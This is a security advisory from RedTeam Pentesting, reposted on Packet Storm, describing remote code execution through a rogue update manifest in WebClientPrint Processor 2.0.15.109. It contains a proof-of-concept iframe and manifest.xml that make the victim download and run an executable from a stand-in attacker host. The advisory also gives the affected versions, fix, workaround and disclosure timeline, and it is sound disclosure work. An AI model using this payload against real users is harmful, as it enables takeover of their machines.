WebClientPrint Processor 2.0.15.109 Updates Remote Code Execution

2017-08-23T00:00:00
ID PACKETSTORM:143892
Type packetstorm
Reporter redteam-pentesting.de
Modified 2017-08-23T00:00:00

Description

                                        
                                            `Advisory: WebClientPrint Processor 2.0: Remote Code Execution via Updates  
  
RedTeam Pentesting discovered that rogue updates trigger a remote code  
execution vulnerability in WebClientPrint Processor (WCPP). These  
updates may be distributed through specially crafted websites and are  
processed without any user interaction as soon as the website is  
accessed. However, the browser must run with administrative privileges.  
  
  
Details  
=======  
  
Product: Neodynamic WebClientPrint Processor  
Affected Versions: 2.0.15.109 (Microsoft Windows)  
Fixed Versions: >= 2.0.15.910  
Vulnerability Type: Remote Code Execution  
Security Risk: low  
Vendor URL: http://www.neodynamic.com/  
Vendor Status: fixed version released  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-009  
Advisory Status: published  
CVE: GENERIC-MAP-NOMATCH  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH  
  
  
Introduction  
============  
  
Neodynamic's WebClientPrint Processor is a client-side application,  
which allows server-side applications to print documents on a client's  
printer without user interaction, bypassing the browser's print  
functionality. The server-side application may be written in ASP.NET or  
PHP while on the client-side multiple platforms and browsers are  
supported.  
  
"Send raw data, text and native commands to client printers without  
showing or displaying any print dialog box!" (Neodynamic's website)  
  
  
More Details  
============  
  
Upon installation under Microsoft Windows, WCPP registers itself as a  
handler for the "webclientprint" URL scheme. Thus, any URL starting with  
"webclientprint:" is handled by WCPP. For example, entering  
  
webclientprint:-about  
  
in the URL bar of a browser opens the about box of WCPP.  
  
During RedTeam Pentesting's investigation it turned out that WCPP  
supports an undocumented update mechanism. Through the following URL the  
update mechanism is triggered:  
  
webclientprint:-update:http://legitimate.example.com/somedir/manifest.xml  
  
This instructs WCPP to fetch the file "manifest.xml" from the  
"legitimate.example.com" host. Furthermore, it was found that an XML  
file of the following structure is expected:  
  
------------------------------------------------------------------------  
<?xml version="1.0" encoding="UTF-8"?>  
<manifest>  
<AvailableVersion>5.0.0</AvailableVersion>  
<AppUrl>http://legitimate.example.com/somedir/wcpp.exe</AppUrl>  
</manifest>  
------------------------------------------------------------------------  
  
Next, the XML file is parsed and the updated version of WCPP is fetched  
from the URL  
  
http://legitimate.example.com/somedir/wcpp.exe  
  
with the returned byte stream being written to  
  
C:\Program Files (x86)\Neodynamic\WCPP for Windows\v2.0\wcpp.exe  
  
on a Windows 7 x86_64 machine. For the write process to succeed,  
elevated or administrative privileges are required. Thus, the browser  
which invokes WCPP must run with elevated or administrative privileges.  
  
  
Proof of Concept  
================  
  
An attacker may prepare a malicious website containing the following  
HTML code:  
  
------------------------------------------------------------------------  
<html>  
<body>  
<iframe src="webclientprint:-update:http://attack.example.com/somedir/manifest.xml">  
</iframe>  
</body>  
</html>  
------------------------------------------------------------------------  
  
Furthermore, the attacker can provide a rogue manifest.xml as follows:  
  
------------------------------------------------------------------------  
<?xml version="1.0" encoding="UTF-8"?>  
<manifest>  
<AvailableVersion>5.0.0</AvailableVersion>  
<AppUrl>http://attack.example.com/somedir/wcpp.exe</AppUrl>  
</manifest>  
------------------------------------------------------------------------  
  
Finally, arbitrary code may be placed at the AppUrl URL:  
  
http://attack.example.com/somedir/wcpp.exe  
  
If the malicious website is visited by a WCPP user, the WCPP handler  
(wcpp.exe) of the user's machine is replaced by code arbitrarily chosen  
by the attacker. A visual indication of the update progress is displayed  
and the success is indicated through a message box. However, successful  
exploitation requires no user interaction. Any subsequent invocation of  
an arbitrary webclientprint URL will result in the execution of the  
attacker's code. Thus, the attacker may deliver a second inline frame  
containing a webclientprint URL in order to force immediate execution of  
the attacker's code.  
  
  
Workaround  
==========  
  
Affected users should disable the WCPP handler and upgrade to a fixed  
version as soon as possible.  
  
Fix  
===  
  
Install a WCPP version greater or equal to 2.0.15.910[0].  
  
  
Security Risk  
=============  
  
If a WCPP user visits an attacker-controlled website, the attacker may  
execute arbitrary code on the machine of the victim user. However,  
successful exploitation is only possible if the browser is running with  
elevated or administrative privileges. On modern Microsoft Windows  
systems, this is a rather strong prerequisite. Furthermore, the update  
process is indicated on the user's screen, potentially causing  
suspicion.  
  
If successful, the attacker gains administrative privileges as well. A  
skilful attacker may restore the original WCPP immediately while  
migrating the malicious code to another place. This way, WCPP  
functionality would not be disrupted and the attacked users may be  
tricked to believe that a legitimate update has just occurred.  
  
Because of the rarely fulfilled prerequisite of a browser running with  
elevated or administrative privileges, this vulnerability is estimated  
to pose a low risk.  
  
  
Timeline  
========  
  
2015-08-24 Vulnerability identified  
2015-09-03 Customer approved disclosure to vendor  
2015-09-04 Asked vendor for security contact  
2015-09-04 CVE number requested  
2015-09-04 Vendor responded with security contact  
2015-09-07 Vendor notified  
2015-09-07 Vendor acknowledged receipt of advisory  
2015-09-15 Vendor released fixed version  
2015-09-16 Customer asked to wait with advisory release until all their  
clients are updated  
2017-07-31 Customer approved advisory release  
2017-08-22 Advisory released  
  
  
References  
==========  
  
[0] https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/  
  
  
Working at RedTeam Pentesting  
=============================  
  
RedTeam Pentesting is looking for penetration testers to join our team  
in Aachen, Germany. If you are interested please visit:  
https://www.redteam-pentesting.de/jobs/  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschaftsfuhrer: Patrick Hof, Jens Liebchen  
`